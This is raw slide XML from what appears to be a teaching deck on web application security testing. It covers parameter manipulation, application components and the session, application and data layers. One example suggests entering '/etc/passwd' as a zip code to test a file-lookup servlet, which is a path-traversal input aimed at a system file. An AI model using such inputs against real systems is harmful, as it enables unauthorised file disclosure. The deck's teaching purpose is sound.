              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>particular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>complicated situations, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>have to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>recompute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> a valid integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>check value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, like a checksum or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Majority </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>tests involve manipulation of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>back and forth between a server and a browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>to understand how they are packed and shipped before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>one can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>manipulate them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Security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Providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>evidence that an application sufficiently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>fulfills</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>its requirements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>face of hostile and malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>inputs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Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>of the ways </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>categorize web applications is by the number and kind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>of accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>interfaces they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>simple architectures have everything </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>encapsulated in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>one or two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Complex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>architectures have several components, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>complicated of all have several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>multi component </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>applications tied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>together</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>A component is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>an encapsulated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>nugget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>functionality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Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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component is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>encapsulated nugget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>of functionality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can be considered a black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>has inputs, it produces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>When you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>have a database, it makes an obvious component because its input is a SQL query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>its output is some data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>applications become more complex, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>frequently broken down into more specialized components, with each handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>a separate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>bit of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>large, sophisticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>multi component </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>systems, each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>component usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>executes on its own physically separate computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Frequently components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>are separated logically in the network, also, with some components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>in more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>trusted network zones and other components in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>zones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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>rchitectures in terms of both the number of layers and what the components in those layers generally do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Common components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>The most common web applications are built on a Model-View-Controller (MVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>) design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>purpose of this development paradigm is to separate the functions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>input and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>output (the “View”) from the operations of the business requirements (the “Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>”) integrated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>by the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Controller” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Permits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>separate development, testing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>and maintenance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>of these aspects of the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr lang="en-I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Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>or presentation layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Mainly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>responsible for tracking the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and managing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>the decorations and graphics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and interface logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>logic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to issue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, expire, and manage headers, cookies, and transmission security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>typically SSL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>do presentation-layer jobs such as sending different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>visualizations to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>the user based on the detected web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>browser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Application layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>present as a distinct layer, contains the bulk of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the business logic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session component determines which HTTP connections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>belong to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>a given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>session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application layer makes decisions regarding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>functionality and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>control</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Data layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>When you have a separate data layer, you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>explicitly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>assigned the job of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>storing data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to a separate component in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>commonly this is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>sort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the application needs to store or retrieve data, it uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>data component</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty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Given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>the many components that are possible, the number of separate layers that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>are present </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>in the system influence its complexity a great </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>deal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>also serve as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>focal points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>or interfaces for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>must make sure you test each component and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>know what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>sorts of tests make sense at each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>layer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One-layer </a:t>
            </a:r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All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>its business logic, data, and other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>resources in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>explicit separation of duties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>between: handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>connection itself, session management, data management, and enforcing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the business rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Java server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>page (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>JSP) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> that takes a few parameters as input and chooses to offer different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>files for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>download as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>result</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>stores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>thousands of files, each containing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>current weather </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>report for a given zip code. When the user enters their zip code, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>application displays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>the corresponding file. There is logic to test (what if the user enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>xyz as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>her </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>zip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>code?) and there are even security tests possible (what if the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> as her zip code?). There is only the one logic (e.g., the one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>consider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, though. </a:t>
            </a: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One-layer </a:t>
            </a:r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Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>an error means you look in just the one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>one-layer web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>app: Identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>its inputs and its outputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>you would with any application, and perform your usual testing of positive, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>negative, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>values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Two-layer </a:t>
            </a:r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Usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>a single session/application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>a data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
